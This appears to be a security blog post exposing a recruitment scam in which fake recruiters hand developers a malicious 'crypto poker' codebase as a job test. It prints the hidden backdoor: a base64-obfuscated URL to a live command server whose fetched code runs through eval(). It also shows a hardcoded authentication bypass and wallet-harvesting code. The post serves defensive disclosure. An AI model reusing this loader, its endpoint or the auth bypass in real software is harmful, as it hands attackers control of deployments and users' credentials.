Exposing the 'Multibank Crypto Poker' Recruitment Scam
If it looks too good to be true, it is
Posted: 2025-08-20
TL;DR
Fake recruiters are pushing a malicious “crypto poker” codebase. It contains remote code execution, broken authentication, and wallet harvesting. If you’re asked to deploy it as part of a job test: it’s a scam.
The Discovery
I was recently offered a “blockchain gaming” job with a suspiciously high salary. The technical assessment included a codebase called Multibank Crypto Poker.
A quick inspection revealed:
- It isn’t a product.
- It isn’t a test.
- It’s a trap.
The Scam Infrastructure
The repository presents itself as a polished poker platform, supposedly linked to MultiBank Group, a real financial company. Under the surface, it hides critical malicious code.
1. Remote Code Execution
The most critical vulnerability is in /routes/api/auth.js:
(async () => {
  const src = atob(process.env.AUTH_API_KEY);
  const proxy = (await import('node-fetch')).default;
  try {
    const response = await proxy(src);
    if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`);
    const proxyInfo = await response.text();
    eval(proxyInfo); // CRITICAL: Executes arbitrary code!
  } catch (err) {
    console.error('Auth Error!', err);
  }
})();
This automatically fetches code from a remote server and executes it. Whoever controls that server controls your deployment.
The Command & Control Infrastructure
The backdoor connects to: https://multibank-api-ten.vercel.app/api/data
This URL is base64-encoded in the environment variable:
AUTH_API_KEY = "aHR0cHM6Ly9tdWx0aWJhbmstYXBpLXRlbi52ZXJjZWwuYXBwL2FwaS9kYXRh"
The attack sequence:
- Decodes the base64 string using atob(process.env.AUTH_API_KEY)
- Fetches whatever code is hosted at that Vercel endpoint
- Executes it using eval()
This design allows attackers to change payloads dynamically without touching the GitHub repository. Different victims could receive different malicious code based on timing, IP address, or other factors.
Reporting the Infrastructure
I've reported the Vercel endpoint to their abuse team at https://vercel.com/abuse.
The endpoint was live at time of analysis and could be serving different payloads to different victims.
2. Deliberately Broken Authentication
In /controllers/auth.js:
const isMatch = true; // Every password works
Credentials are collected but never verified. Security theater at best, credential harvesting at worst.
3. Wallet Harvesting
The frontend wallet connection (/client/src/pages/ConnectWallet/ConnectWallet.js) captures wallet addresses and pushes them to the server.
There is no blockchain logic, no smart contracts, no signing—just collection.
4. Template Scam Signs
Commented-out database code. Suspicious commit history removing comments. Clear evidence of a recycled scam package.
How the Scam Works
- Recruiters offer inflated salaries.
- Candidates receive this “assessment project.”
- Developers are asked to deploy it. They even said it was a required step during the interview.
- The code harvests credentials and wallet data.
- The backdoor provides attackers with ongoing control.
Red Flags
- High pay for trivial work.
- Requests to deploy before review.
- “Crypto gaming” without blockchain.
- Shiny README, rotten implementation.
- Recruiters unable to discuss technical details.
Protecting Yourself
- Audit all code before running it.
- Search for eval() and base64 URLs.
- Check authentication logic.
- Verify company links.
- Never deploy code you don’t fully understand.
Taking Action
If you encounter this:
- Do not run it.
- Report to GitHub abuse and local cybercrime units.
- Document everything.
- Warn your peers.
Technical Indicators
- eval() fetching remote code.
- Base64 URLs in environment variables.
- Hardcoded password checks.
- Wallet address collection without blockchain logic.
- Commented-out core services.
Conclusion
This is a recruitment scam targeting developers. By hiding malware in a “job test,” attackers hope you will deploy their system and do their work for them.
Stay skeptical. If the offer looks too good to be true, and the project code reads like a security nightmare, trust your instincts: it’s a scam.
Happi Hacking AB
KIVRA: 556912-2707
106 31 Stockholm